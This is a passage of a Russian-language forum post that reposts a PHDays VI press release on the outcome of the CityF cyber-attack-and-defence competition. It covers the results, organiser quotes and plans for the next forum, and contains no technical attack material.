    • обнаружить одного инсайдера — сотрудника офиса CorpF.
    Итоги

    Форум наглядно показал, что специалисты по информационной безопасности в силах обеспечить очень высокий уровень защиты без нарушения технологического процесса. Финальной цели — захватить домен города и выиграть соревнование — ни одной команде хакеров достигнуть не удалось. Такой исход оказался неожиданным и для организаторов: они прогнозировали победу хакеров. По итогам игры жюри не смогло назвать явных победителей, призовые места заняли команды хакеров, которые оказались лучшими по ходу игры. Команды защитников и SOC были награждены в различных номинациях.

    [​IMG] Алексей Качалин, заместитель директора по развитию бизнеса компании Positive Technologies в России, член оргкомитета PHDays комментирует итоги противостояния: «Победили все — и организаторы, и участники. Это уникальное событие и сложно выработать четкие правила, не поиграв. Надеемся, что те, кто принял участие в этом году, придут к нам в следующем и помогут в подготовке игры. Мы будем привлекать команды защиты и нападения для формирования правил и формата».

    [​IMG] Однозначно можно сказать, что PHDays VI удался, с этим согласна и директор форума PHDays Виктория Алексеева: «PHDays — это прежде всего люди, на энтузиазме которых делается это мероприятие. Целый год более 100 человек делали все, чтобы форум стал не просто "ивентом", а настоящим праздником. Каждый раз мы, организаторы, преодолеваем себя, делаем шаг вперед, ставим новые рекорды. Я считаю, что все удалось: 4200 участников — тому подтверждение. Хочу выразить благодарность всем, кто помог нам в организации PHDays!».

    Пока трудно прогнозировать, под каким лозунгом пройдут форум и конкурсы в следующем году, но организаторы намерены развить концепцию противостояния. Говорят, что нас ожидает развитие игрового сюжета: будет больше экшена, социнженерии и событий, связанных, например, с увольнением сотрудника, больше изменений в бизнес-процессах, появятся дневные и ночные сценарии. И, конечно, в будущем CityF обещает стать еще более «населенным».

    [​IMG]«Мы видим, как в последние годы стремительно меняется окружающий нас мир. Кибербезопасность все сильнее проникает в повседневные технологии. Угрозы становятся все сложнее, атаки — более изощренными, а ущерб от них — все ощутимее. Строить системы защиты по-старому уже не получается — необходимо быстро совершенствовать методы защиты, но еще быстрее развиваться нам самим. Под стать этому меняется и PHDays. Мы рады, что в этом году наша конференция обрела еще один смысл: дать возможность разным представителям индустрии поучаствовать в противостоянии и получить реальный опыт защиты объектов критически важной инфраструктуры. И горящие глаза ребят после 30 часов битвы для нас лучшая награда. Но мы не хотим останавливаться на достигнутом, и в следующем году мы расширим список участников противостояния профессиональными пентестерами и другими представителями IT-сферы», — делится идеями генеральный директор Positive Technologies Юрий Максимов.

    Уже сейчас многие партнеры и команды высказали готовность принять участие в следующих соревнованиях. Например, Алексей Лукацкий предлагает не сбрасывать со счетов Cisco в планах на PHDays VII: «Думаю, что у такого формата блистательные перспективы и CityF задал очень высокую планку для CTF, которые будут организовываться в будущем. И если геополитическая ситуация в мире не ухудшится, то компания Cisco вновь станет технологическим партнером PHDays. Безусловно, стоит рассматривать нас и в качестве спикеров будущего мероприятия и, возможно, даже в качестве защитников какого-либо сегмента CityF. Но эту идею нам еще надо обмозговать внутри компании».

    Каким будет PHDays VII, — покажет время. Однако уже сейчас мы уверенно можем сказать, что седьмому форуму быть!

    [​IMG]

    Источник: http://www.phdays.ru/press/news/77074/
     
  19. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084